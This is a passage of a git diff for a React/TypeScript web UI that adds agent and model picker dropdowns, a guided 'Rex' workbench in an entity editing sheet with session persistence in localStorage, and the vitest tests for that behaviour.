+                onPointerLeave={hideTooltip}
+              >
+                {t('agentPicker.hint')}
+              </div>
+            </div>
+            {showSourceFilter && (
+              <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px] dark:border-zinc-800 dark:bg-zinc-950">
+                {(['all', 'builtin', 'custom'] as AgentSourceFilter[]).map((filter) => (
+                  <button
+                    key={filter}
+                    type="button"
+                    onClick={() => setSourceFilter(filter)}
+                    className={`rounded px-1.5 py-0.5 transition-colors ${
+                      sourceFilter === filter
+                        ? 'bg-zinc-100 text-zinc-900 dark:bg-zinc-800 dark:text-zinc-50'
+                        : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
+                    }`}
+                  >
+                    {t(`agentPicker.filter.${filter}`)}
+                  </button>
+                ))}
+              </div>
+            )}
+          </div>
+          <div className="h-64 space-y-0.5 overflow-y-auto p-1.5">
+            {loading ? (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('loading')}</div>
+            ) : filteredAgents.length > 0 ? (
+              filteredAgents.map((agent) => {
+                const displayName = getAgentDisplayName(agent, i18n.language);
+                const primaryDesc = getAgentDisplayDescription(agent, i18n.language) || t('smartAssistant'); // Generic description when the agent has none.
+                return (
+                  <button
+                    key={agent.name}
+                    type="button"
+                    onClick={() => { onSelectAgent(agent.name); setOpen(false); }}
+                    className={`w-full min-w-0 rounded-md px-2 py-1.5 text-left transition-colors ${
+                      selectedAgent === agent.name
+                        ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                        : 'hover:bg-zinc-50 text-zinc-700 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
+                    }`}
+                  >
+                    <div className="flex min-w-0 items-center gap-2">
+                      <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                      <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">
+                        {displayName}
+                      </span>
+                      <span className={`shrink-0 rounded px-1.5 py-0.5 text-[9px] font-medium ${
+                        agent.mode === 'primary' || agent.native
+                          ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
+                          : 'bg-teal-50 text-teal-600 dark:bg-teal-950/40 dark:text-teal-200'
+                      }`}>
+                        {agent.mode === 'primary'
+                          ? t('agentPicker.badge.primary')
+                          : agent.native
+                            ? t('agentPicker.badge.builtin')
+                            : t('agentPicker.badge.custom')}
+                      </span>
+                      <div className="ml-auto flex shrink-0 items-center gap-1">
+                        {primaryDesc && (
+                          <span
+                            className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
+                            onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                            onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                            onPointerEnter={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseEnter={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseOver={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseLeave={hideTooltip}
+                            onPointerLeave={hideTooltip}
+                          >
+                            <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
+                          </span>
+                        )}
+                      </div>
+                    </div>
+                  </button>
+                );
+              })
+            ) : (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('noAgents')}</div>
+            )}
+          </div>
+        </div>
+      )}
+      <SelectorTooltipOverlay tooltip={tooltip} />
+    </div>
+  );
+}
+
+export function ChatModelPicker({ // Dropdown for choosing the model; options are rendered in per-provider sections.
+  groupedOptions,
+  loading,
+  selectedModelOption,
+  onSelectModel,
+}: {
+  groupedOptions: ChatModelProviderGroup[];
+  loading: boolean;
+  selectedModelOption: ChatModelOption | null;
+  onSelectModel: (option: ChatModelOption) => void;
+}) {
+  const { t } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const { tooltip, showTooltip, hideTooltip } = useSelectorTooltip();
+  const hasOptions = groupedOptions.some((group) => group.models.length > 0); // Gates the trigger button. NOTE(review): the list below tests groupedOptions.length instead — confirm groups are never passed in empty.
+
+  useEffect(() => { // While open, close the menu on any mousedown outside this picker.
+    if (!open) return;
+    const handle = (event: MouseEvent) => {
+      const target = event.target as HTMLElement;
+      if (!target.closest('[data-model-selector]')) setOpen(false);
+    };
+    document.addEventListener('mousedown', handle);
+    return () => document.removeEventListener('mousedown', handle);
+  }, [open]);
+
+  useEffect(() => { // A tooltip must not outlive the menu it belongs to.
+    if (!open) hideTooltip();
+  }, [hideTooltip, open]);
+
+  return (
+    <div className="relative" data-model-selector>
+      <button
+        type="button"
+        onClick={() => setOpen((value) => !value)}
+        disabled={loading || !hasOptions}
+        className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
+        title={selectedModelOption ? `${selectedModelOption.providerName} / ${selectedModelOption.modelID}` : t('modelPicker.empty')}
+      >
+        <Cpu className="h-3 w-3 shrink-0" />
+        <span className="truncate font-medium">
+          {selectedModelOption?.label ?? (loading ? t('loading') : t('modelPicker.empty'))}
+        </span>
+        <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${open ? 'rotate-180' : ''}`} />
+      </button>
+      {open && (
+        <div className="absolute right-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+          <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('modelPicker.title')}</div>
+            <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">{t('modelPicker.hint')}</div>
+          </div>
+          <div className="h-[13.5rem] overflow-y-auto p-1.5">
+            {loading ? (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('loading')}</div>
+            ) : groupedOptions.length > 0 ? (
+              groupedOptions.map((group) => (
+                <div key={group.providerID} className="py-1 first:pt-0 last:pb-0">
+                  <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur dark:bg-zinc-900/95 dark:text-zinc-400">
+                    <span className="truncate">{group.providerName}</span>
+                    <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500 dark:bg-zinc-800 dark:text-zinc-300">
+                      {t('modelPicker.count', { count: group.models.length })}
+                    </span>
+                  </div>
+                  <div className="space-y-0.5">
+                    {group.models.map((option) => (
+                      <button
+                        key={option.key}
+                        type="button"
+                        onClick={() => {
+                          onSelectModel(option); // Report the choice, then close the menu.
+                          setOpen(false);
+                        }}
+                        className={`w-full rounded-md px-2 py-1.5 text-left transition-colors ${
+                          selectedModelOption?.key === option.key
+                            ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                            : 'text-zinc-700 hover:bg-zinc-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
+                        }`}
+                      >
+                        <div className="flex min-w-0 items-center gap-2">
+                          <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                          <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">{option.label}</span>
+                          {option.supportsVision === true && (
+                            <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300">
+                              {t('modelPicker.vision')}
+                            </span>
+                          )}
+                          <div className="ml-auto flex shrink-0 items-center gap-1">
+                            <span
+                              className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
+                              onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                              onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                              onPointerEnter={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseEnter={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseOver={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseLeave={hideTooltip}
+                              onPointerLeave={hideTooltip}
+                            >
+                              <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
+                            </span>
+                          </div>
+                        </div>
+                      </button>
+                    ))}
+                  </div>
+                </div>
+              ))
+            ) : (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('modelPicker.empty')}</div>
+            )}
+          </div>
+        </div>
+      )}
+      <SelectorTooltipOverlay tooltip={tooltip} />
+    </div>
+  );
+}
diff --git a/webui/src/components/common/EntitySheet.test.tsx b/webui/src/components/common/EntitySheet.test.tsx
index e95894f17..99a8ac78f 100644
--- a/webui/src/components/common/EntitySheet.test.tsx
+++ b/webui/src/components/common/EntitySheet.test.tsx
@@ -1,23 +1,53 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest';
-import { render, screen } from '@testing-library/react';
+import { render, screen, waitFor } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
+import SessionChat from '@/components/common/SessionChat';
 import EntitySheet from '@/components/common/EntitySheet';
 
+const { mockClientGet, mockClientPost, mockConversationHasMessages, mockUseSessionChat } = vi.hoisted(() => ({ // Shared mock handles, created via vi.hoisted so the vi.mock factories in this file can reference them.
+  mockClientGet: vi.fn(),
+  mockClientPost: vi.fn(),
+  mockConversationHasMessages: { current: true }, // Mutable flag passed to the conversation bottom slot as `hasMessages`.
+  mockUseSessionChat: vi.fn(),
+}));
+
 // ---------------------------------------------------------------------------
 // Mocks
 // ---------------------------------------------------------------------------
 
 vi.mock('@/hooks/useSessionChat', () => ({
-  useSessionChat: vi.fn(() => ({
-    sessionId: null,
-    loading: false,
-    error: null,
-    create: vi.fn().mockResolvedValue(undefined),
-    retry: vi.fn().mockResolvedValue(undefined),
-    reset: vi.fn(),
-  })),
+  useSessionChat: mockUseSessionChat,
 }));
 
+vi.mock('@/components/common/SessionChat', async () => { // Stub SessionChat with a plain div that exposes its `display` prop and renders the bottom slot.
+  const React = await import('react');
+  return {
+    default: vi.fn((props: any) => {
+      const bottomSlot = typeof props.conversationBottomSlot === 'function' // The slot is either a render function or a ready-made node.
+        ? props.conversationBottomSlot({
+            sendPrompt: vi.fn(),
+            setInput: vi.fn(),
+            focusInput: vi.fn(),
+            sending: false,
+            streaming: false,
+            sessionId: props.sessionId,
+            hasMessages: mockConversationHasMessages.current, // Controlled per test through the hoisted flag.
+          })
+        : props.conversationBottomSlot;
+
+      return React.createElement(
+        'div',
+        {
+          'data-testid': 'session-chat',
+          'data-display': JSON.stringify(props.display ?? null), // Serialised so tests can assert on the display options.
+        },
+        bottomSlot ? React.createElement('div', { 'data-testid': 'conversation-bottom-slot' }, bottomSlot) : null,
+      );
+    }),
+    buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  };
+});
+
 // Provide a t() that returns actual Chinese text so the test assertions match
 // what users see in the browser (mirror of zh-CN/common.json entity section).
 const entityTranslations: Record<string, string> = {
@@ -27,7 +57,7 @@ const entityTranslations: Record<string, string> = {
   'entity.defaultCreate': '创建',
   'entity.defaultSave': '保存',
   'entity.tabDetails': '详情',
-  'entity.tabAIEdit': 'AI 编辑',
+  'entity.tabAIEdit': '工作台',
   'entity.tabTest': '测试',
   'entity.rexThinking': 'Agent 正在思考中...',
   'entity.editAndSend': '编辑下方内容，发送给 Agent 查看效果',
@@ -41,6 +71,7 @@ const entityTranslations: Record<string, string> = {
   'entity.cancelButton': '取消',
   'entity.extracting': '提取中...',
   'entity.extractFromRex': '从 Rex 提取配置',
+  'entity.extractFromRexGuideDesc': '将 Rex 输出的配置摘要提取到表单。',
   'entity.switchToForm': '切换到表单',
   'entity.testStartFailed': '测试启动失败',
   'entity.extractFailed': '提取失败，请重试',
@@ -65,12 +96,12 @@ vi.mock('react-i18next', () => ({
 
 vi.mock('@/api/client', () => ({
   default: {
-    post: vi.fn(),
-    get: vi.fn(),
+    post: mockClientPost,
+    get: mockClientGet,
     interceptors: { request: { use: vi.fn() }, response: { use: vi.fn() } },
   },
   apiClient: {
-    get: vi.fn(),
+    get: mockClientGet,
     interceptors: { request: { use: vi.fn() }, response: { use: vi.fn() } },
   },
   getApiBase: () => '',
@@ -95,6 +126,19 @@ describe('EntitySheet', () => {
 
   beforeEach(() => {
     vi.clearAllMocks();
+    window.localStorage.clear();
+    mockClientGet.mockResolvedValue({ data: {} });
+    mockClientPost.mockResolvedValue({ data: {} });
+    mockConversationHasMessages.current = true;
+    mockUseSessionChat.mockReturnValue({
+      sessionId: null,
+      loading: false,
+      error: null,
+      create: vi.fn().mockResolvedValue(undefined),
+      createAndSend: vi.fn().mockResolvedValue(undefined),
+      retry: vi.fn().mockResolvedValue(undefined),
+      reset: vi.fn(),
+    });
   });
 
   describe('Tab navigation', () => {
@@ -105,7 +149,9 @@ describe('EntitySheet', () => {
         </EntitySheet>,
       );
 
-      expect(screen.getByText('AI 编辑')).toBeInTheDocument();
+      expect(screen.getByText('工作台')).toBeInTheDocument();
+      expect(screen.getByRole('button', { name: '详情' })).toHaveClass('flex-1');
+      expect(screen.getByRole('button', { name: '工作台' })).toHaveClass('flex-1');
     });
 
     it('should default to Form tab in edit mode', () => {
@@ -131,6 +177,187 @@ describe('EntitySheet', () => {
 
       expect(screen.getByText('Form content')).toBeInTheDocument();
     });
+
+    it('defaults Rex workbench process details collapsed like workflow workbenches', () => {
+      render(
+        <EntitySheet {...defaultProps} initialTab="rex">
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      expect(screen.getByTestId('session-chat')).toHaveAttribute(
+        'data-display',
+        JSON.stringify({ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }),
+      );
+      expect(vi.mocked(SessionChat)).toHaveBeenCalledWith(
+        expect.objectContaining({
+          display: {
+            collapseIntermediateSteps: true,
+            processGroupsDefaultOpen: false,
+          },
+        }),
+        undefined,
+      );
+    });
+
+    it('renders extract from Rex as a guide action instead of a standalone footer action', async () => {
+      const user = userEvent.setup();
+      const onExtractFromRex = vi.fn().mockResolvedValue(undefined);
+
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'rex-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          onExtractFromRex={onExtractFromRex}
+          rexGuideGroups={[{
+            title: '编辑引导',
+            actions: [{
+              label: '检查模型策略',
+              description: '检查当前模型是否合适',
+              prompt: '检查模型策略',
+            }],
+          }]}
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      expect(screen.getByTestId('conversation-bottom-slot')).toBeInTheDocument();
+      expect(screen.getAllByRole('button', { name: '从 Rex 提取配置' })).toHaveLength(1);
+
+      const sessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(sessionChatProps.sessionId).toBe('rex-session-1');
+      expect(sessionChatProps.welcomeContent).toBeTruthy();
+      expect(sessionChatProps.welcomeContent.props.groups[0].actions.map((action: any) => action.label)).toEqual([
+        '从 Rex 提取配置',
+        '检查模型策略',
+      ]);
+
+      await user.click(screen.getByRole('button', { name: '从 Rex 提取配置' }));
+
+      await waitFor(() => {
+        expect(onExtractFromRex).toHaveBeenCalledWith('rex-session-1');
+      });
+    });
+
+    it('hides the bottom guide dock when the Rex conversation has no messages', () => {
+      mockConversationHasMessages.current = false;
+      const onExtractFromRex = vi.fn().mockResolvedValue(undefined);
+
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'rex-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          onExtractFromRex={onExtractFromRex}
+          rexGuideGroups={[{
+            title: '编辑引导',
+            actions: [{
+              label: '检查模型策略',
+              description: '检查当前模型是否合适',
+              prompt: '检查模型策略',
+            }],
+          }]}
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      const sessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(sessionChatProps.sessionId).toBe('rex-session-1');
+      expect(sessionChatProps.welcomeContent).toBeTruthy();
+      expect(screen.queryByTestId('conversation-bottom-slot')).not.toBeInTheDocument();
+    });
+
+    it('resumes and stores Rex sessions when a storage key is provided', async () => {
+      window.localStorage.setItem(
+        'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        'persisted-session-1',
+      );
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'persisted-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          rexSessionStorageKey="agent-edit:audit-agent"
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      await waitFor(() => {
+        expect(mockClientGet).toHaveBeenCalledWith('/api/session/persisted-session-1');
+        expect(mockUseSessionChat).toHaveBeenCalledWith(expect.objectContaining({
+          initialSessionId: 'persisted-session-1',
+        }));
+      });
+
+      await waitFor(() => {
+        expect(window.localStorage.getItem(
+          'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        )).toBe('persisted-session-1');
+      });
+    });
+
+    it('clears a stored Rex session when validation reports it missing', async () => {
+      window.localStorage.setItem(
+        'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        'missing-session-1',
+      );
+      mockClientGet.mockRejectedValueOnce({ response: { status: 404 } });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          rexSessionStorageKey="agent-edit:audit-agent"
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      await waitFor(() => {
+        expect(mockClientGet).toHaveBeenCalledWith('/api/session/missing-session-1');
+        expect(window.localStorage.getItem(
+          'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        )).toBeNull();
+      });
+
+      const latestSessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(latestSessionChatProps.sessionId).toBeNull();
+      expect(latestSessionChatProps.welcomeContent).toBeTruthy();
+      expect(mockUseSessionChat).not.toHaveBeenCalledWith(expect.objectContaining({
+        initialSessionId: 'missing-session-1',
+      }));
+    });
   });
 
   describe('Header', () => {
diff --git a/webui/src/components/common/EntitySheet.tsx b/webui/src/components/common/EntitySheet.tsx
index 373e18053..d999bc1fb 100644
--- a/webui/src/components/common/EntitySheet.tsx
+++ b/webui/src/components/common/EntitySheet.tsx
@@ -19,7 +19,6 @@ import {
   MessageSquare,
   Loader2,
   AlertCircle,
-  Wand2,
   ArrowRight,
   TestTube,
   Send,
@@ -28,9 +27,17 @@ import {
 } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import client from '@/api/client';
-import SessionChat from './SessionChat';
+import SessionChat, { buildInstructionDisplayText, type SessionChatDisplay } from './SessionChat';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
+import ChatGuideDock, { type ChatGuideAction } from './ChatGuideDock';
+import GuidedCreatePanel, { type GuidedCreateGroup } from './GuidedCreatePanel';
+import type { Agent } from '@/api/agent';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from './sidePanelSizing';
 // ─── Context ──────────────────────────────────────────────────────────────────
 
 interface EntitySheetCtx {
@@ -41,6 +48,41 @@ interface EntitySheetCtx {
 }
 
 const EntitySheetContext = createContext<EntitySheetCtx>({ openRex: () => {}, openTest: () => {} });
+const REX_WORKBENCH_DISPLAY: SessionChatDisplay = {
+  collapseIntermediateSteps: true,
+  processGroupsDefaultOpen: false,
+};
+const EXTRACT_FROM_REX_GUIDE_PROMPT = '__flocks_extract_from_rex__';
+const REX_SESSION_STORAGE_PREFIX = 'flocks:entity-sheet:rex-session:v1';
+
+function rexSessionStorageKey(key: string): string {
+  return `${REX_SESSION_STORAGE_PREFIX}:${key}`;
+}
+
+function readStoredRexSessionId(key?: string | null): string | null {
+  if (!key || typeof window === 'undefined') return null;
+
+  try {
+    return window.localStorage.getItem(rexSessionStorageKey(key));
+  } catch {
+    return null;
+  }
+}
+
+function writeStoredRexSessionId(key: string | undefined, sessionId: string | null) {
+  if (!key || typeof window === 'undefined') return;
+
+  try {
+    const storageKey = rexSessionStorageKey(key);
+    if (sessionId) {
+      window.localStorage.setItem(storageKey, sessionId);
+    } else {
+      window.localStorage.removeItem(storageKey);
+    }
+  } catch {
+    // Ignore storage failures; the active in-memory chat still works.
+  }
+}
 
 /** Consume inside form content to get access to openRex() / openTest() */
 export function useEntitySheet() {
@@ -79,7 +121,7 @@ export interface EntitySheetProps {
   onClose: () => void;
   onSubmit: () => void | Promise<void>;
   /**
-   * If provided, a "从 Rex 提取配置" button appears in the Rex tab.
+   * If provided, a "从 Rex 提取配置" action appears in the Rex tab.
    * Called with current sessionId when the button is clicked.
    * Should resolve on success (EntitySheet auto-switches to form tab)
    * or throw on failure (error is shown to user).
@@ -96,10 +138,30 @@ export interface EntitySheetProps {
   hideRex?: boolean;
   /** Hide Test tab */
   hideTest?: boolean;
-  /** Hide form tab (rex-only sheet, e.g. API 创建只能从 AI 编辑开始) */
+  /** Hide form tab (rex-only sheet, e.g. API 创建只能从工作台开始) */
   hideForm?: boolean;
   /** Initial tab when open (e.g. "form" to show 详情 first when creating) */
   initialTab?: 'form' | 'rex';
+  /** Guided actions shown in the Rex tab before and after the conversation starts. */
+  rexGuideGroups?: GuidedCreateGroup[];
+  rexGuidePanelTitle?: string;
+  rexGuidePanelDesc?: string;
+  rexGuideEmptyTitle?: string;
+  rexGuideCollapseTitle?: string;
+  rexGuideExpandTitle?: string;
+  rexGuideIcon?: React.ReactNode;
+  /** SessionChat composer options for Rex-assisted pages. */
+  rexAgentName?: string;
+  rexMentionAgents?: Agent[];
+  rexModel?: { providerID: string; modelID: string } | null;
+  rexSupportsVision?: boolean | null;
+  rexContextWindowTokens?: number | null;
+  /** Persist and resume the Rex conversation across refreshes when provided. */
+  rexSessionStorageKey?: string;
+  rexToolbarSlot?: React.ReactNode;
+  rexCenterToolbarSlot?: React.ReactNode;
+  rexComposerTextareaMinHeight?: number;
+  rexComposerTextareaMaxHeight?: number;
   /** Optional element rendered on the left side of the form-tab footer (e.g. delete button) */
   footerLeft?: React.ReactNode;
 }
@@ -119,8 +181,8 @@ export default function EntitySheet({
   submitLoading,
   submitLabel,
   width: initialWidth,
-  minWidth = 400,
-  maxWidth = 800,
+  minWidth = SIDE_PANEL_MIN_WIDTH,
+  maxWidth,
   onClose,
   onSubmit,
   onExtractFromRex,
@@ -130,10 +192,29 @@ export default function EntitySheet({
   hideTest = false,
   hideForm = false,
   initialTab,
+  rexGuideGroups,
+  rexGuidePanelTitle,
+  rexGuidePanelDesc,
+  rexGuideEmptyTitle,
+  rexGuideCollapseTitle,
+  rexGuideExpandTitle,
+  rexGuideIcon,
+  rexAgentName,
+  rexMentionAgents,
+  rexModel,
+  rexSupportsVision,
+  rexContextWindowTokens,
+  rexSessionStorageKey,
+  rexToolbarSlot,
+  rexCenterToolbarSlot,
+  rexComposerTextareaMinHeight,
+  rexComposerTextareaMaxHeight,
   footerLeft,
 }: EntitySheetProps) {
   const { t } = useTranslation('common');
   const supportsVision = useDefaultModelVision();
+  const resolvedInitialWidth = () => initialWidth ?? getInitialSidePanelWidth();
+  const resolvedMaxWidth = maxWidth ?? getMaxSidePanelWidth();
   const showTabs = !(hideRex && hideTest);
   const hasFormTab = !hideForm;
   const title =
@@ -157,10 +238,12 @@ export default function EntitySheet({
   const [extracting, setExtracting] = useState(false);
   const [extractError, setExtractError] = useState<string | null>(null);
   const [rexInitialMessage, setRexInitialMessage] = useState<string | null>(null);
-  const [drawerWidth, setDrawerWidth] = useState(initialWidth ?? 560);
+  const [storedRexSessionId, setStoredRexSessionId] = useState<string | null>(null);
+  const [rexSessionHydrated, setRexSessionHydrated] = useState(() => !rexSessionStorageKey);
+  const [drawerWidth, setDrawerWidth] = useState(resolvedInitialWidth);
   const [isDragging, setIsDragging] = useState(false);
   const dragStartX = useRef(0);
-  const dragStartWidth = useRef(560);
+  const dragStartWidth = useRef(resolvedInitialWidth());
 
   // ── Rex session via unified hook ──────────────────────────────────────────
   const {
@@ -176,7 +259,48 @@ export default function EntitySheet({
     category: 'entity-config',
     contextMessage: rexSystemContext,
     welcomeMessage: rexWelcomeMessage,
+    initialSessionId: storedRexSessionId,
   });
+  const activeRexSessionId = storedRexSessionId || sessionId;
+
+  useEffect(() => {
+    let cancelled = false;
+    setRexSessionHydrated(false);
+
+    const stored = readStoredRexSessionId(rexSessionStorageKey);
+    if (!stored) {
+      setStoredRexSessionId(null);
+      setRexSessionHydrated(true);
+      return () => {
+        cancelled = true;
+      };
+    }
+
+    (async () => {
+      try {
+        await client.get(`/api/session/${stored}`);
+        if (cancelled) return;
+        setStoredRexSessionId(stored);
+      } catch {
+        if (cancelled) return;
+        writeStoredRexSessionId(rexSessionStorageKey, null);
+        setStoredRexSessionId(null);
+      } finally {
+        if (!cancelled) {
+          setRexSessionHydrated(true);
+        }
+      }
+    })();
+
+    return () => {
+      cancelled = true;
+    };
+  }, [rexSessionStorageKey]);
+
+  useEffect(() => {
+    if (!rexSessionHydrated || !sessionId) return;
+    writeStoredRexSessionId(rexSessionStorageKey, sessionId);
+  }, [rexSessionHydrated, rexSessionStorageKey, sessionId]);
 
   // ── Test tab state ────────────────────────────────────────────────────────
   const [testPrompt, setTestPrompt] = useState(effectiveDefaultTestPrompt);
@@ -185,6 +309,46 @@ export default function EntitySheet({
   const [testError, setTestError] = useState<string | null>(null);
   const testTextareaRef = useRef<HTMLTextAreaElement>(null);
   const isComposingRef = useRef(false);
+  const effectiveRexGuideGroups = (rexGuideGroups ?? [])
+    .map((group) => ({
+      ...group,
+      actions: group.actions.filter((action) => action.label && action.prompt),
+    }))
+    .filter((group) => group.actions.length > 0);
+  const baseRexGuideActions: ChatGuideAction[] = effectiveRexGuideGroups.flatMap((group) => (
+    group.actions.map((action) => ({
+      ...action,
+      group: action.group ?? group.title,
+    }))
+  ));
+  const extractRexGuideAction: ChatGuideAction | null = onExtractFromRex && activeRexSessionId
+    ? {
+        label: t('entity.extractFromRex'),
+        description: t('entity.extractFromRexGuideDesc'),
+        prompt: EXTRACT_FROM_REX_GUIDE_PROMPT,
+        group: effectiveRexGuideGroups[0]?.title,
+      }
+    : null;
+  const rexGuideActions = extractRexGuideAction
+    ? [extractRexGuideAction, ...baseRexGuideActions]
+    : baseRexGuideActions;
+  const rexWelcomeGuideGroups = extractRexGuideAction
+    ? effectiveRexGuideGroups.length > 0
+      ? [
+          {
+            ...effectiveRexGuideGroups[0],
+            actions: [extractRexGuideAction, ...effectiveRexGuideGroups[0].actions],
+          },
+          ...effectiveRexGuideGroups.slice(1),
+        ]
+      : [{ title: '', actions: [extractRexGuideAction] }]
+    : effectiveRexGuideGroups;
+  const hasRexGuideActions = rexGuideActions.length > 0;
+  const showRexFooter =
+    activeTab === 'rex' &&
+    (Boolean(extractError) ||
+      Boolean(!onExtractFromRex && activeRexSessionId && hasFormTab) ||
+      (mode === 'create' && !hasRexGuideActions));
 
   // ── Auto-resize test textarea ─────────────────────────────────────────────
 
@@ -201,7 +365,9 @@ export default function EntitySheet({
   useEffect(() => {
     if (!open) {
       setActiveTab(getDefaultTab());
-      resetRexSession();
+      if (!rexSessionStorageKey) {
+        resetRexSession();
+      }
       setRexInitialMessage(null);
       setExtracting(false);
       setExtractError(null);
@@ -209,9 +375,9 @@ export default function EntitySheet({
       setTestLoading(false);
       setTestError(null);
       setTestPrompt(effectiveDefaultTestPrompt);
-      setDrawerWidth(initialWidth ?? 560);
+      setDrawerWidth(resolvedInitialWidth());
     }
-  }, [open, mode, defaultTestPrompt, resetRexSession, initialWidth, showTabs, hideRex, hideForm, initialTab]);
+  }, [open, mode, defaultTestPrompt, resetRexSession, initialWidth, showTabs, hideRex, hideForm, initialTab, rexSessionStorageKey]);
 
   // ── Tab handling ──────────────────────────────────────────────────────────
 
@@ -236,7 +402,7 @@ export default function EntitySheet({
 
       const handleMouseMove = (ev: MouseEvent) => {
         const delta = dragStartX.current - ev.clientX;
-        setDrawerWidth(Math.min(maxWidth, Math.max(minWidth, dragStartWidth.current + delta)));
